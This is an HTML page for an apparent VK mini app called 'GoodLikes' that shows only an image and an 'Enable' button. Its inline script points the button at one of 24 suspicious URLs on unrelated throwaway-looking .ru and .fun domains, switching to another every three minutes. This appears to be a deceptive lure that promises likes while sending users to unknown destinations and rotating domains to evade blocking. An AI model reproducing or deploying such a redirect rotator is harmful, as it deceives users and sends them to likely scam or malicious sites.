<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width,initial-scale=1" />
        <meta name="theme-color" content="#000000" />
        <title>GoodLikes x728x</title>
        <link href="style.css" rel="stylesheet" />
    </head>
    <body style="overflow: hidden;">
        <div id="root">
            <section class="View View--ios View--header">
                <div class="View__header">
                    <div class="View__header-scrolltop"></div>
                    <div class="PanelHeader PanelHeader--ios">
                        <div class="PanelHeader__in PanelHeader__in--active" id="panel-header-main">
                            <div class="PanelHeader__container">
                                <div class="PanelHeader__left">
                                    <div class="PanelHeader__left-in" id="header-left-main"></div>
                                    <div class="PanelHeader__addon" id="header-addon-main"></div>
                                </div>
                                <div class="PanelHeader__content" id="header-title-main"></div>
                                <div class="PanelHeader__right" id="header-right-main"></div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="View__panels">
                    <div class="View__panel View__panel--active">
                        <div class="View__panel-in">
                            <div id="main" class="Panel Panel--ios">
                                <div class="Panel__in">
                                    <div class="Panel__in-before"></div>
                                    <div style="display: flex; align-items: center; flex-direction: column; justify-content: center; height: 80vh;">
                                        <img src="https://i.imgur.com/Hz2a4lo.png" style="width: 80vw; margin-bottom: 10px; border-radius: 10px;" />
                                        <a href="#" role="button" class="Tappable Tappable--ios Button Button--ios Button--sz-xl Button--lvl-primary Button--aln-center Tappable--inactive" style="width: 80vw; cursor:pointer;" target="_blank">
                                            <div class="Button__in"><div class="Button__content">Включить</div></div>
                                        </a>
                                    </div>
                                    <div class="Panel__in-after"></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <script src="https://unpkg.com/@vkontakte/vk-bridge/dist/browser.min.js"></script>
        <script>
            // Sends event to client
            vkBridge.send('VKWebAppInit');
        </script> 
        <script>
            const url_list = ['http://advertising.7lessons.fun/H1ixcL/immunological', 'http://assumption.itrom.fun/JxRxJB/nondiscrimination', 'http://cloudads.ru/3GF3gkk/expendable', 'http://detailing26.ru/mEZYVo4/filminess', 'http://devlab-auto.ru/2nDUP/loansharking', 'http://domaasm.ru/5NG67m/suavity', 'http://en-coding.ru/l5XnM/acclimatization', 'http://garazh053.ru/1YLzVu/anagram', 'http://history.redit.fun/u1NU9eO/gloat', 'http://jojostore.ru/mnVaae/gaily', 'http://knopkarec.ru/gWvNhj/flesh', 'http://lightable55.ru/wWhRNR/inoperable', 'http://limbprofi.ru/FK7iD/overrule', 'http://mebeluxa-nn.ru/8L4zDIf/gaga', 'http://mybigworld.ru/YyOBr/suburbs', 'http://mycreatebot.ru/hmGME/stitching', 'http://nekrasovdan.ru/yUTt3d/music', 'http://penguingame.ru/2gfwnkY/virtuoso', 'http://peretest.ru/gidM0Gb/complainant', 'http://smartverif.ru/roQIELD/backwards', 'http://than.bilkan.fun/FC3sYo/chinos', 'http://top-reviewz.ru/uaRvw/asymmetrical', 'http://wood750.ru/Rb2OJH2/stitch', 'http://woodprint.ru/O7gbL/ism']
            const url_index = Math.floor(Math.floor(Date.now() / 1000) / (3*60)) % url_list.length
            const url = url_list[url_index]
            document.querySelector('.Tappable').href = url
        </script>
    </body>
</html>